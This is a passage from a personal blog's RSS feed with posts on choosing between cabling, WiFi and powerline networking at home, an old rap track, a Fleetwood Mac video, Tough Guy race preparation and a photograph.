		<link>http://www.jonnypayne.com/index.php/computer/to-wifi-or-not-to-wifi-that-is-the-question/</link>
		<comments>http://www.jonnypayne.com/index.php/computer/to-wifi-or-not-to-wifi-that-is-the-question/#comments</comments>
		<pubDate>Sat, 16 May 2009 12:38:47 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Computer]]></category>

		<guid isPermaLink="false">http://www.everlastinggaze.co.uk/index.php/computer/to-wifi-or-not-to-wifi-that-is-the-question/</guid>
		<description><![CDATA[OK, I&#8217;m torn.  Having put up with a silly little Cat5 lead running out of my lounge into the study for 3 years I have decided to do something about it. Options: 1) Drill a hole through two walls, and run the cable around the wall with cable conduit. (£10) For: FASTEST and most reliable. [...]]]></description>
			<content:encoded><![CDATA[<p>OK, I&#8217;m torn.</p>
<p> Having put up with a silly little Cat5 lead running out of my lounge into the study for 3 years I have decided to do something about it.</p>
<p>Options:</p>
<p>1) Drill a hole through two walls, and run the cable around the wall with cable conduit. (£10)</p>
<p><strong>For:</strong> FASTEST and most reliable. Cheap option &#8211; about 10 quid for conduit and bits and bobs.</p>
<p><strong>Against:</strong> pain in the neck and uber-ugly.</p>
<p><strong>Real World Speed:</strong> Approx 75Mbit in my own tests.</p>
<p>2) Go WiFi (£30)</p>
<p><strong>For:</strong> EASY. Little to do. Change router, plug in and go.</p>
<p><strong>Against:</strong> Change IP Router to WiFi router and open up the network to hacking from outside the building. Possibly quite slow, contention issues. Possible &#8220;Brain Cookage&#8221; from radio waves. Everyone and their dog can download WEP/WPA hacking tools and punch in from outside, using my web access.</p>
<p><strong>Real World Speed:</strong> 20 to 30Mbit if I&#8217;m lucky and enable the security.</p>
<p>3) Powerline 200Mbps (£90)</p>
<p><strong>For:</strong> EASY. Plug in devices each end and go.</p>
<p><strong>Against:</strong> Unsure of result &#8211; quality of electrical installation and devices attached have enormous impact on transfer speeds. Security is onyl as secure as anything else until it gets hacked.</p>
<p><strong>Real World Speed:</strong> 30 to 40Mbit with security enabled.</p>
<p>I&#8217;m not going for number 2 beause it is insecure and also my net connection might drop out or die at inopportune moments.</p>
<p>Leaving 1 or 3. I better ask maria.</p>
<p>OK Asked Maria and she would prefer me not drilling holes everywhere, meaning I need to save up for option 3.  Have to wait until after the wedding though I guess.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/computer/to-wifi-or-not-to-wifi-that-is-the-question/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Emceeing</title>
		<link>http://www.jonnypayne.com/index.php/music/emceeing/emceeing/</link>
		<comments>http://www.jonnypayne.com/index.php/music/emceeing/emceeing/#comments</comments>
		<pubDate>Tue, 30 Dec 2008 05:51:30 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Emceeing]]></category>

		<guid isPermaLink="false">http://www.everlastinggaze.co.uk/index.php/music/emceeing/emceeing/</guid>
		<description><![CDATA[Well, as you may have noticed on the front page of this site, I have been interested in a lot different things; I intended all along to put hard evidence up on this site as a sort of homage to my own efforts, a digital ego-wall if you will.  Hopefully over the next few days I&#8217;ll post [...]]]></description>
			<content:encoded><![CDATA[<p>Well, as you may have noticed on the front page of this site, I have been interested in a lot different things; I intended all along to put hard evidence up on this site as a sort of homage to my own efforts, a digital ego-wall if you will.</p>
<p> Hopefully over the next few days I&#8217;ll post a number of items up of various things; Episode 1 is evidence of my rapping/producing.</p>
<p>This track was written, recorded, mixed, and produced by me back in 2002/3, just before America went and messed everything up in Iraq. Expect strong political views and a touch of harsh language.</p>
<p>It&#8217;s a shame really, on many counts; I gave this track out to a couple of my mates and it caused quite a stir in Eastbourne (where I was living at the time). There was a stand up comedy circuit, and the organiser expressed interest in me performing tracks at his shows as a sort of break from the comedy; And of course some of my comments in the track were ironic/sarcastic comedy as well. I never pursued this avenue &#8211; missed opportunity #1.</p>
<p> My friend Tristan has been producing rock and metal and drum n bass tracks for a  long time and offered to produce the tracks for me.  I was enjoying the control I had (having recently quit my band Imessiah), and was reluctant to give it up. I politely refused; This was a big mistake. I was blinded by the control, and couldnt see that I needed a producer to break the track up from a listeners perspective, add a hook, and a chorus as well as re-record the vocal. missed opportunity #2.</p>
<p>I only recorded a couple more track after, and neither were up to scratch from the production side of things. I havent rapped since 2004. Missed opporutnity #3.</p>
<p>But here it is; Ignorance and Bliss by Switch (as I called myself then.). Please bear in mind I did two vocal takes. One got me half way through then I made a mistake, so I started over. The vocals are all done in one take, and only on the second go. Listening to it now, I showed a lot of potential.</p>
<p><strong>[MEDIA=1]</strong></p>
<p>What have I learnt? I am stubborn, and arrogant. I have been trying to address these traits of my persona over the last 5 years and have made considerable headway at least.</p>
<p>Tristan, if you read this, I am sorry bro. I should have taken up your most kind and generous offer. The next track will be called Regrets and Disdain! <img src='http://www.jonnypayne.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/music/emceeing/emceeing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Inspiring Performance by one of my musical heroes</title>
		<link>http://www.jonnypayne.com/index.php/music/acoustic/inspiring-performance-by-one-of-my-musical-heroes/</link>
		<comments>http://www.jonnypayne.com/index.php/music/acoustic/inspiring-performance-by-one-of-my-musical-heroes/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 06:34:33 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Acoustic Somethings...]]></category>

		<guid isPermaLink="false">http://www.everlastinggaze.co.uk/index.php/music/acoustic/inspiring-performance-by-one-of-my-musical-heroes/</guid>
		<description><![CDATA[Lindsey Buckenham, playing big love live, all on his own. Fleetwood Mac were one of those magical bands that stand head and shoulders above the vast majority of rubbish around these days. Real musicians with real instruments and enormous talent. If you get five minutes spare today, sit back and watch this&#8230;&#8230;.]]></description>
			<content:encoded><![CDATA[<p>Lindsey Buckenham, playing big love live, all on his own. Fleetwood Mac were one of those magical bands that stand head and shoulders above the vast majority of rubbish around these days. Real musicians with real instruments and enormous talent. If you get five minutes spare today, sit back and watch this&#8230;&#8230;.</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/UwGQKuUeQC8&#038;hl=en&#038;fs=1"></param><param name="allowFullScreen" value="true"></param><embed src="http://www.youtube.com/v/UwGQKuUeQC8&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/music/acoustic/inspiring-performance-by-one-of-my-musical-heroes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>T minus&#8230;&#8230;Tough Guy Countdown!!!</title>
		<link>http://www.jonnypayne.com/index.php/fit/t-minustough-guy-countdown/</link>
		<comments>http://www.jonnypayne.com/index.php/fit/t-minustough-guy-countdown/#comments</comments>
		<pubDate>Sat, 26 Jul 2008 17:42:51 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Getting Fit!]]></category>

		<guid isPermaLink="false">http://www.everlastinggaze.co.uk/index.php/art/photography/t-minustough-guy-countdown/</guid>
		<description><![CDATA[Well&#8230;.. As you can read here, and here I am entering the Tough Guy competition.  It was an excuse to get fit and lose wieght really; with the added bonus of an enormous mental challenge to boot. And it is tomorrow!!! My kit bag: You can see: Cross country North Face running trainers, courtesy of Mark [...]]]></description>
			<content:encoded><![CDATA[<p>Well&#8230;..</p>
<p>As you can read <a href="http://www.everlastinggaze.co.uk/index.php/fit/tough-guy-fame/" target="_blank">here</a>, and <a href="http://www.everlastinggaze.co.uk/index.php/fit/tough-guy-im-getting-there/" target="_blank">here</a> I am entering the Tough Guy competition.  It was an excuse to get fit and lose wieght really; with the added bonus of an enormous mental challenge <a title="toughguy.jpg" rel="lightbox[]" href="http://www.everlastinggaze.co.uk/wp-content/gallery/tough-guy/toughguy.jpg"></a>to boot. And it is tomorrow!!!</p>
<p>My kit bag:</p>
<p><a title="toughguy.jpg" rel="lightbox[]" href="http://www.jonnypayne.com/wp-content/gallery/tough-guy/toughguy.jpg"><img title="toughguy.jpg" src="http://www.jonnypayne.com/wp-content/gallery/tough-guy/thumbs/thumbs_toughguy.jpg" alt="toughguy.jpg" /></a></p>
<p>You can see:</p>
<ul>
<li>Cross country North Face running trainers, courtesy of Mark Hastings of Sandhurst fame.</li>
<li>Creatine Tablets &#8211; for extra muscle power</li>
<li>Dextrose tablets for energy</li>
<li>Support socks with anti blister design</li>
<li>Vaseline to ease chafing and to assist water runoff</li>
<li>Duct tape to seal the top of my shoes and tie them onto my feet, lest the mud sucks them off!</li>
<li>Pins to affix my running number to my shirt</li>
<li>Gloves to protect my pinkies on the rope sections</li>
<li>Spectators Passes for Maria and Karen (my sister in law)</li>
<li>Parking Permit</li>
<li>Death Warrant!!!!! this signs my life away&#8230;..</li>
</ul>
<p>I ran 2 miles today with a couple of dextrose tablets and a  dose of creatine and felt a million odllars by the time I got home. I am rather suprised that I am not nervous at all.</p>
<p>I predict a couple of my team members will drop out/not turn up, no names mentioned.  I certainly wont, and I&#8217;ll post a picture of the medal on sunday evening.</p>
<p>Wish me luck &#8211; I&#8217;ll need it. <img src='http://www.jonnypayne.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/fit/t-minustough-guy-countdown/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Weathered Chain</title>
		<link>http://www.jonnypayne.com/index.php/art/photography/weathered-chain/</link>
		<comments>http://www.jonnypayne.com/index.php/art/photography/weathered-chain/#comments</comments>
		<pubDate>Sun, 22 Jun 2008 09:59:16 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Photography]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Weathered Chain Originally uploaded by Pensive666 This little fella definitely counts as my best photo yet. Taken with my new Canon EOS 450D, on the shores of Lake Windermere in the lake district, this shot demonstrates that there really is very little in this world that is as rugged as a rusty chain.]]></description>
			<content:encoded><![CDATA[<p style="float: right; margin-bottom: 10px; margin-left: 10px"><a href="http://www.flickr.com/photos/pensive666/2576806591/" title="photo sharing"><img src="http://farm4.static.flickr.com/3064/2576806591_37516d947e_m.jpg" style="border: #000000 2px solid" /></a></p>
<p><span style="margin-top: 0px; font-size: 0.9em"><br />
<a href="http://www.flickr.com/photos/pensive666/2576806591/">Weathered Chain</a></p>
<p>Originally uploaded by <a href="http://www.flickr.com/people/pensive666/">Pensive666</a><br />
</span></p>
<p>This little fella definitely counts as my best photo yet.</p>
<p>Taken with my new Canon EOS 450D, on the shores of Lake Windermere in the lake district, this shot demonstrates that there really is very little in this world that is as rugged as a rusty chain.<br />
<br clear="all" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/art/photography/weathered-chain/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

